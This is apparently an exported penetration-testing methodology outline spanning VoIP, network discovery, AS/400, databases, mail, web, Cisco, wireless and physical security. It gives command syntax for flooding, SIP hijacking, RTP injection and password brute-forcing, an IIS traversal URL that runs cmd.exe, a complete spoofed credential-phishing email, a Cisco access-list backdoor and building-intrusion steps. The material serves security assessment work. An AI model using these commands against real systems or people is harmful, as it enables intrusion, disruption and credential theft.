1. VoIP Security
1.1. Sniffing Tools
1.1.1. AuthTool
1.1.2. Cain & Abel
1.1.3. Etherpeek
1.1.4. NetDude
1.1.5. Oreka
1.1.6. PSIPDump
1.1.7. SIPomatic
1.1.8. SIPv6 Analyzer
1.1.9. UCSniff
1.1.10. VoiPong
1.1.11. VOMIT
1.1.12. Wireshark
1.1.13. WIST - Web Interface for SIP Trace
1.2. Scanning and Enumeration Tools
1.2.1. enumIAX
1.2.2. fping
1.2.3. IAX Enumerator
1.2.4. iWar
1.2.5. Nessus
1.2.6. Nmap
1.2.7. SIP Forum Test Framework (SFTF)
1.2.8. SIPcrack
1.2.9. sipflanker
1.2.9.1. python sipflanker.py 192.168.1-254
1.2.10. SIP-Scan
1.2.11. SIP.Tastic
1.2.12. SIPVicious
1.2.13. SiVuS
1.2.14. SMAP
1.2.14.1. smap IP_Address/Subnet_Mask
1.2.14.2. smap -o IP_Address/Subnet_Mask
1.2.14.3. smap -l IP_Address
1.2.15. snmpwalk
1.2.16. VLANping
1.2.17. VoIPAudit
1.2.18. VoIP GHDB Entries
1.2.19. VoIP Voicemail Database
1.3. Packet Creation and Flooding Tools
1.3.1. H.323 Injection Files
1.3.2. H225regreject
1.3.3. IAXHangup
1.3.4. IAXAuthJack
1.3.5. IAX.Brute
1.3.6. IAXFlooder
1.3.6.1. ./iaxflood sourcename destinationname numpackets
1.3.7. INVITE Flooder
1.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
1.3.8. kphone-ddos
1.3.9. RTP Flooder
1.3.10. rtpbreak
1.3.11. Scapy
1.3.12. Seagull
1.3.13. SIPBomber
1.3.14. SIPNess
1.3.15. SIPp
1.3.16. SIPsak
1.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
1.3.16.2. Options request:- sipsak -vv -s sip:username@domain
1.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
1.3.17. SIP-Send-Fun
1.3.18. SIPVicious
1.3.19. Spitter
1.3.20. TFTP Brute Force
1.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
1.3.21. UDP Flooder
1.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
1.3.22. UDP Flooder (with VLAN Support)
1.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
1.3.23. Voiphopper
1.4. Fuzzing Tools
1.4.1. Asteroid
1.4.2. Codenomicon VoIP Fuzzers
1.4.3. Fuzzy Packet
1.4.4. Mu Security VoIP Fuzzing Platform
1.4.5. ohrwurm RTP Fuzzer
1.4.6. PROTOS H.323 Fuzzer
1.4.7. PROTOS SIP Fuzzer
1.4.8. SIP Forum Test Framework (SFTF)
1.4.9. Sip-Proxy
1.4.10. Spirent ThreatEx
1.5. Signaling Manipulation Tools
1.5.1. AuthTool
1.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
1.5.2. BYE Teardown
1.5.3. Check Sync Phone Rebooter
1.5.4. RedirectPoison
1.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
1.5.5. Registration Adder
1.5.6. Registration Eraser
1.5.7. Registration Hijacker
1.5.8. SIP-Kill
1.5.9. SIP-Proxy-Kill
1.5.10. SIP-RedirectRTP
1.5.11. SipRogue
1.5.12. vnak
1.6. Media Manipulation Tools
1.6.1. RTP InsertSound
1.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
1.6.2. RTP MixSound
1.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
1.6.3. RTPProxy
1.6.4. RTPInject
1.7. Generic Software Suites
1.7.1. OAT Office Communication Server Tool Assessment
1.7.2. EnableSecurity VOIPPACK
1.7.2.1. Note: - Add-on for Immunity Canvas
1.8. References
1.8.1. URL's
1.8.1.1. Common Vulnerabilities and Exploits (CVE)
1.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
1.8.1.2. Default Passwords
1.8.1.3. Hacking Exposed VoIP
1.8.1.3.1. Tool Pre-requisites
1.8.1.4. VoIPsa
1.8.2. White Papers
1.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
1.8.2.2. An Analysis of VoIP Security Threats and Tools
1.8.2.3. Hacking VoIP Exposed
1.8.2.4. Security testing of SIP implementations
1.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
1.8.2.6. Two attacks against VoIP
1.8.2.7. VoIP Attacks!
1.8.2.8. VoIP Security Audit Program (VSAP)
2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
2.1. Default Port Lists
2.1.1. Windows
2.1.2. *nix
2.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
2.2.1. General Enumeration Tools
2.2.1.1. nmap
2.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
2.2.1.2. netcat
2.2.1.2.1. nc -v -n IP_Address port
2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
2.2.1.3. amap
2.2.1.3.1. amap -bqv 192.168.1.1 80
2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
2.2.1.4. xprobe2
2.2.1.4.1. xprobe2 192.168.1.1
2.2.1.5. sinfp
2.2.1.5.1. ./sinfp.pl -i -p
2.2.1.6. nbtscan
2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
2.2.1.7. hping
2.2.1.7.1. hping ip_address
2.2.1.8. scanrand
2.2.1.8.1. scanrand ip_address:all
2.2.1.9. unicornscan
2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
2.2.1.10. netenum
2.2.1.10.1. netenum network/netmask timeout
2.2.1.11. fping
2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
2.2.2. Firewall Specific Tools
2.2.2.1. firewalk
2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
2.2.2.2. ftester
2.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
2.2.3. Default Passwords (Examine list)
2.2.3.1. Passwords A
2.2.3.2. Passwords B
2.2.3.3. Passwords C
2.2.3.4. Passwords D
2.2.3.5. Passwords E
2.2.3.6. Passwords F
2.2.3.7. Passwords G
2.2.3.8. Passwords H
2.2.3.9. Passwords I
2.2.3.10. Passwords J
2.2.3.11. Passwords K
2.2.3.12. Passwords L
2.2.3.13. Passwords M
2.2.3.14. Passwords N
2.2.3.15. Passwords O
2.2.3.16. Passwords P
2.2.3.17. Passwords R
2.2.3.18. Passwords S
2.2.3.19. Passwords T
2.2.3.20. Passwords U
2.2.3.21. Passwords V
2.2.3.22. Passwords W
2.2.3.23. Passwords X
2.2.3.24. Passwords Y
2.2.3.25. Passwords Z
2.2.3.26. Passwords (Numeric)
2.3. Active Hosts
2.3.1. Open TCP Ports
2.3.2. Closed TCP Ports
2.3.3. Open UDP Ports
2.3.4. Closed UDP Ports
2.3.5. Service Probing
2.3.5.1. SMTP Mail Bouncing
2.3.5.2. Banner Grabbing
2.3.5.2.1. Other
2.3.5.2.2. HTTP
2.3.5.2.3. HTTPS
2.3.5.2.4. SMTP
2.3.5.2.5. POP3
2.3.5.2.6. FTP
2.3.6. ICMP Responses
2.3.6.1. Type 3 (Port Unreachable)
2.3.6.2. Type 8 (Echo Request)
2.3.6.3. Type 13 (Timestamp Request)
2.3.6.4. Type 15 (Information Request)
2.3.6.5. Type 17 (Subnet Address Mask Request)
2.3.6.6. Responses from broadcast address
2.3.7. Source Port Scans
2.3.7.1. TCP/UDP 53 (DNS)
2.3.7.2. TCP 20 (FTP Data)
2.3.7.3. TCP 80 (HTTP)
2.3.7.4. TCP/UDP 88 (Kerberos)
2.3.8. Firewall Assessment
2.3.8.1. Firewalk
2.3.8.2. TCP/UDP/ICMP responses
2.3.9. OS Fingerprint
3. AS/400 Auditing
3.1. Remote
3.1.1. Information Gathering
3.1.1.1. Nmap using common iSeries (AS/400) services.
3.1.1.1.1. Unsecured services (Port;name;description)
3.1.1.1.2. Secured services (Port;name;description)
3.1.1.2. NetCat (old school technique)
3.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
3.1.1.3. Banners Grabbing
3.1.1.3.1. Telnet
3.1.1.3.2. FTP
3.1.1.3.3. HTTP Banner
3.1.1.3.4. POP3
3.1.1.3.5. SNMP
3.1.1.3.6. SMTP
3.1.2. Users Enumeration
3.1.2.1. Default AS/400 users accounts
3.1.2.2. Error messages
3.1.2.2.1. Telnet Login errors
3.1.2.2.2. POP3 authentication Errors
3.1.2.3. Qsys symbolic link (if ftp is enabled)
3.1.2.3.1. ftp target | quote stat | quote site namefmt 1
3.1.2.3.2. cd /
3.1.2.3.3. quote site listfmt 1
3.1.2.3.4. mkdir temp
3.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
3.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
3.1.2.3.7. dir /temp/qsys/*.usrprf
3.1.2.4. LDAP
3.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
3.1.2.4.2. Tool to browse LDAP
3.1.3. Exploitation
3.1.3.1. CVE References
3.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
3.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
3.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
3.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
3.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
3.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
3.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
3.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
3.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
3.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
3.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
3.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
3.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
3.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
3.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
3.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
3.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
3.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
3.1.3.2. Access with Work Station Gateway
3.1.3.2.1. http://target:5061/WSG
3.1.3.2.2. Default AS/400 accounts.
3.1.3.3. Network attacks (next release)
3.1.3.3.1. DB2
3.1.3.3.2. QSHELL
3.1.3.3.3. Hijacking Terminals
3.1.3.3.4. Trojan attacks
3.1.3.3.5. Hacking from AS/400
3.2. Local
3.2.1. System Value Security
3.2.1.1. Untitled
3.2.1.1.1. Untitled
3.2.1.2. Untitled
3.2.1.2.1. Untitled
3.2.1.3. Untitled
3.2.1.3.1. Untitled
3.2.1.4. Untitled
3.2.1.4.1. Recommended value is 30
3.2.2. Password Policy
3.2.2.1. Untitled
3.2.2.1.1. Untitled
3.2.2.2. Untitled
3.2.2.2.1. Untitled
3.2.2.3. Untitled
3.2.2.3.1. Untitled
3.2.2.4. Untitled
3.2.2.4.1. Untitled
3.2.2.5. Untitled
3.2.3. Audit level
3.2.3.1. Untitled
3.2.3.1.1. Recommended value is *SECURITY
3.2.4. Documentation
3.2.4.1. Users class
3.2.4.1.1. Untitled
3.2.4.2. System Audit Settings
3.2.4.2.1. Untitled
3.2.4.3. Special Authorities Definitions
3.2.4.3.1. Untitled
4. Server Specific Tests
4.1. Databases
4.1.1. Direct Access Interrogation
4.1.1.1. MS SQL Server
4.1.1.1.1. Ports
4.1.1.1.2. Version
4.1.1.1.3. osql
4.1.1.2. Oracle
4.1.1.2.1. Ports
4.1.1.2.2. TNS Listener
4.1.1.2.3. SQL Plus
4.1.1.2.4. Default Account/Passwords
4.1.1.2.5. Default SID's
4.1.1.3. MySQL
4.1.1.3.1. Ports
4.1.1.3.2. Version
4.1.1.3.3. Users/Passwords
4.1.1.4. DB2
4.1.1.5. Informix
4.1.1.6. Sybase
4.1.1.7. Other
4.1.2. Scans
4.1.2.1. Default Ports
4.1.2.2. Non-Default Ports
4.1.2.3. Instance Names
4.1.2.4. Versions
4.1.3. Password Attacks
4.1.3.1. Sniffed Passwords
4.1.3.1.1. Cracked Passwords
4.1.3.1.2. Hashes
4.1.3.2. Direct Access Guesses
4.1.4. Vulnerability Assessment
4.1.4.1. Automated
4.1.4.1.1. Reports
4.1.4.1.2. Vulnerabilities
4.1.4.2. Manual
4.1.4.2.1. Patch Levels
4.1.4.2.2. Confirmed Vulnerabilities
4.2. Mail
4.2.1. Scans
4.2.2. Fingerprint
4.2.2.1. Manual
4.2.2.2. Automated
4.2.3. Spoofable
4.2.3.1. Telnet spoof
4.2.3.1.1. telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: [192.168.1.1]X-Originating-Email: [XXXX@XXX.com]MIME-Version: 1.0To: <administrator@target.com>From: < XXXX@XXX.com >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target LtdXXXX@XXX.com.
4.2.4. Relays
4.3. VPN
4.3.1. Scanning
4.3.1.1. 500 UDP IPSEC
4.3.1.2. 1723 TCP PPTP
4.3.1.3. 443 TCP/SSL
4.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
4.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
4.3.2. Fingerprinting
4.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
4.3.3. PSK Crack
4.3.3.1. ikeprobe 80.75.68.27
4.3.3.2. sniff for responses with C&A or ikecrack
4.4. Web
4.4.1. Vulnerability Assessment
4.4.1.1. Automated
4.4.1.1.1. Reports
4.4.1.1.2. Vulnerabilities
4.4.1.2. Manual
4.4.1.2.1. Patch Levels
4.4.1.2.2. Confirmed Vulnerabilities
4.4.2. Permissions
4.4.2.1. PUT /test.txt HTTP/1.0
4.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
4.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
4.4.3. Scans
4.4.4. Fingerprinting
4.4.4.1. Other
4.4.4.2. HTTP
4.4.4.2.1. Commands
4.4.4.2.2. Modules
4.4.4.2.3. File Extensions
4.4.4.3. HTTPS
4.4.4.3.1. Commands
4.4.4.3.2. Commands
4.4.4.3.3. File Extensions
4.4.5. Directory Traversal
4.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
5. Bluetooth Specific Testing
5.1. Bluescanner
5.2. Bluesweep
5.3. btscanner
5.4. Redfang
5.5. Blueprint
5.6. Bluesnarfer
5.7. Bluebugger
5.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
5.8. Blueserial
5.9. Bloover
5.10. Bluesniff
5.11. Exploit Frameworks
5.11.1. BlueMaho
5.11.1.1. Untitled
5.12. Resources
5.12.1. URL's
5.12.1.1. BlueStumbler.org
5.12.1.2. Bluejackq.com
5.12.1.3. Bluejacking.com
5.12.1.4. Bluejackers
5.12.1.5. bluetooth-pentest
5.12.1.6. ibluejackedyou.com
5.12.1.7. Trifinite
5.12.2. Vulnerability Information
5.12.2.1. Common Vulnerabilities and Exploits (CVE)
5.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
5.12.3. White Papers
5.12.3.1. Bluesnarfing
6. Cisco Specific Testing
6.1. Methodology
6.1.1. Scan & Fingerprint.
6.1.1.1. Untitled
6.1.1.2. Untitled
6.1.1.3. If SNMP is active, then community string guessing should be performed.
6.1.2. Credentials Guessing.
6.1.2.1. Untitled
6.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
6.1.3. Connect
6.1.3.1. Untitled
6.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
6.1.4. Check for bugs
6.1.4.1. Untitled
6.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
6.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
6.1.5. Further your attack
6.1.5.1. Untitled
6.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
6.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
6.1.5.2. Untitled
6.1.5.2.1. #> access-list 100 permit ip <IP> any
6.2. Scan & Fingerprint.
6.2.1. Port Scanning
6.2.1.1. nmap
6.2.1.1.1. Untitled
6.2.1.2. Other tools
6.2.1.2.1. Untitled
6.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
6.2.2. Fingerprinting
6.2.2.1. Untitled
6.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
6.2.2.2. Untitled
6.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
6.2.2.2.2. Untitled
6.3. Password Guessing.
6.3.1. Untitled
6.3.1.1. ./CAT -h <IP> -a password.wordlist
6.3.1.2. Untitled
6.3.2. Untitled
6.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
6.3.2.2. Untitled
6.3.3. Untitled
6.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
6.3.3.2. Untitled
6.4. SNMP Attacks.
6.4.1. Untitled
6.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
6.4.1.2. Untitled
6.4.2. Untitled
6.4.2.1. onesixytone -c SNMP.wordlist <IP>
6.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
6.4.3. Untitled
6.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
6.4.3.2. Untitled
6.5. Connecting.
6.5.1. Telnet
6.5.1.1. Untitled
6.5.1.1.1. telnet <IP>
6.5.1.1.2. Sample Banners
6.5.2. SSH
6.5.3. Web Browser
6.5.3.1. Untitled
6.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
6.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
6.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
6.5.4. TFTP
6.5.4.1. Untitled
6.5.4.1.1. Untitled
6.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
6.5.4.2. Untitled
6.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
6.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
6.5.4.2.3. Creating backdoors in Cisco IOS using TCL
6.6. Known Bugs.
6.6.1. Attack Tools
6.6.1.1. Untitled
6.6.1.1.1. Untitled
6.6.1.2. Untitled
6.6.1.2.1. Web browse to the Cisco device: http://<IP>
6.6.1.2.2. Untitled
6.6.1.2.3. Untitled
6.6.1.2.4. Untitled
6.6.1.3. Untitled
6.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
6.6.2. Common Vulnerabilities and Exploits (CVE) Information
6.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
6.7. Configuration Files.
6.7.1. Untitled
6.7.1.1. Configuration files explained
6.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
6.7.1.1.2. Untitled
6.7.1.1.3. Untitled
6.7.1.1.4. Password Encryption Utilised
6.7.1.1.5. Untitled
6.7.1.2. Configuration Testing Tools
6.7.1.2.1. Nipper
6.7.1.2.2. fwauto (Beta)
6.8. References.
6.8.1. Cisco IOS Exploitation Techniques
7. Wireless Penetration
7.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
7.1.1. Site Map
7.1.1.1. RF Map
7.1.1.1.1. Lines of Sight
7.1.1.1.2. Signal Coverage
7.1.1.2. Physical Map
7.1.1.2.1. Triangulate APs
7.1.1.2.2. Satellite Imagery
7.1.2. Network Map
7.1.2.1. MAC Filter
7.1.2.1.1. Authorised MAC Addresses
7.1.2.1.2. Reaction to Spoofed MAC Addresses
7.1.2.2. Encryption Keys utilised
7.1.2.2.1. WEP
7.1.2.2.2. WPA/PSK
7.1.2.2.3. 802.1x
7.1.2.3. Access Points
7.1.2.3.1. ESSID
7.1.2.3.2. BSSIDs
7.1.2.4. Wireless Clients
7.1.2.4.1. MAC Addresses
7.1.2.4.2. Intercepted Traffic
7.2. Wireless Toolkit
7.2.1. Wireless Discovery
7.2.1.1. Aerosol
7.2.1.2. Airfart
7.2.1.3. Aphopper
7.2.1.4. Apradar
7.2.1.5. BAFFLE
7.2.1.6. inSSIDer
7.2.1.7. iWEPPro
7.2.1.8. karma
7.2.1.9. KisMAC-ng
7.2.1.10. Kismet
7.2.1.11. MiniStumbler
7.2.1.12. Netstumbler
7.2.1.13. Vistumbler
7.2.1.14. Wellenreiter
7.2.1.15. Wifi Hopper
7.2.1.16. WirelessMon
7.2.1.17. WiFiFoFum
7.2.2. Packet Capture
7.2.2.1. Airopeek
7.2.2.2. Airpcap
7.2.2.3. Airtraf
7.2.2.4. Apsniff
7.2.2.5. Cain
7.2.2.6. Commview
7.2.2.7. Ettercap
7.2.2.8. Netmon
7.2.2.8.1. nmwifi
7.2.2.9. Wireshark
7.2.3. EAP Attack tools
7.2.3.1. eapmd5pass
7.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
7.2.3.1.2. Untitled
7.2.4. Leap Attack Tools
7.2.4.1. asleap
7.2.4.2. thc leap cracker
7.2.4.3. anwrap
7.2.5. WEP/ WPA Password Attack Tools
7.2.5.1. Airbase
7.2.5.2. Aircrack-ptw
7.2.5.3. Aircrack-ng
7.2.5.4. Airsnort
7.2.5.5. cowpatty
7.2.5.6. FiOS Wireless Key Calculator
7.2.5.7. iWifiHack
7.2.5.8. KisMAC-ng
7.2.5.9. Rainbow Tables
7.2.5.10. wep attack
7.2.5.11. wep crack
7.2.5.12. wzcook
7.2.6. Frame Generation Software
7.2.6.1. Airgobbler
7.2.6.2. airpwn
7.2.6.3. Airsnarf
7.2.6.4. Commview
7.2.6.5. fake ap
7.2.6.6. void 11
7.2.6.7. wifi tap
7.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
7.2.6.8. FreeRADIUS - Wireless Pwnage Edition
7.2.7. Mapping Software
7.2.7.1. Online Mapping
7.2.7.1.1. WIGLE
7.2.7.1.2. Skyhook
7.2.7.2. Tools
7.2.7.2.1. Knsgem
7.2.8. File Format Conversion Tools
7.2.8.1. ns1 recovery and conversion tool
7.2.8.2. warbable
7.2.8.3. warkizniz
7.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
7.2.8.4. ivstools
7.2.9. IDS Tools
7.2.9.1. WIDZ
7.2.9.2. War Scanner
7.2.9.3. Snort-Wireless
7.2.9.4. AirDefense
7.2.9.5. AirMagnet
7.3. WLAN discovery
7.3.1. Unencrypted WLAN
7.3.1.1. Visible SSID
7.3.1.1.1. Sniff for IP range
7.3.1.2. Hidden SSID
7.3.1.2.1. Deauth client
7.3.2. WEP encrypted WLAN
7.3.2.1. Visible SSID
7.3.2.1.1. WEPattack
7.3.2.2. Hidden SSID
7.3.2.2.1. Deauth client
7.3.3. WPA / WPA2 encrypted WLAN
7.3.3.1. Deauth client
7.3.3.1.1. Capture EAPOL handshake
7.3.4. LEAP encrypted WLAN
7.3.4.1. Deauth client
7.3.4.1.1. Break LEAP
7.3.5. 802.1x WLAN
7.3.5.1. Create Rogue Access Point
7.3.5.1.1. Airsnarf
7.3.5.1.2. fake ap
7.3.5.1.3. Hotspotter
7.3.5.1.4. Karma
7.3.5.1.5. Linux rogue AP
7.3.6. Resources
7.3.6.1. URL's
7.3.6.1.1. Wirelessdefence.org
7.3.6.1.2. Russix
7.3.6.1.3. Wardrive.net
7.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
7.3.6.2. White Papers
7.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
7.3.6.2.2. 802.11b Firmware-Level Attacks
7.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
7.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
7.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
7.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
7.3.6.2.7. Active behavioral fingerprinting of wireless devices
7.3.6.3. Common Vulnerabilities and Exploits (CVE)
7.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
8. Physical Security
8.1. Building Security
8.1.1. Meeting Rooms
8.1.1.1. Check for active network jacks.
8.1.1.2. Check for any information in room.
8.1.2. Lobby
8.1.2.1. Check for active network jacks.
8.1.2.2. Does receptionist/guard leave lobby?
8.1.2.3. Accessbile printers? Print test page.
8.1.2.4. Obtain phone/personnel listing.
8.1.3. Communal Areas
8.1.3.1. Check for active network jacks.
8.1.3.2. Check for any information in room.
8.1.3.3. Listen for employee conversations.
8.1.4. Room Security
8.1.4.1. Resistance of lock to picking.
8.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
8.1.4.2. Ceiling access areas.
8.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
8.1.5. Windows
8.1.5.1. Check windows/doors for visible intruderalarm sensors.
8.1.5.2. Check visible areas for sensitive information.
8.1.5.3. Can you video users logging on?
8.2. Perimeter Security
8.2.1. Fence Security
8.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
8.2.2. Exterior Doors
8.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
8.2.3. Guards
8.2.3.1. Patrol Routines
8.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
8.2.3.2. Communications
8.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
8.3. Entry Points
8.3.1. Guarded Doors
8.3.1.1. Piggybacking
8.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
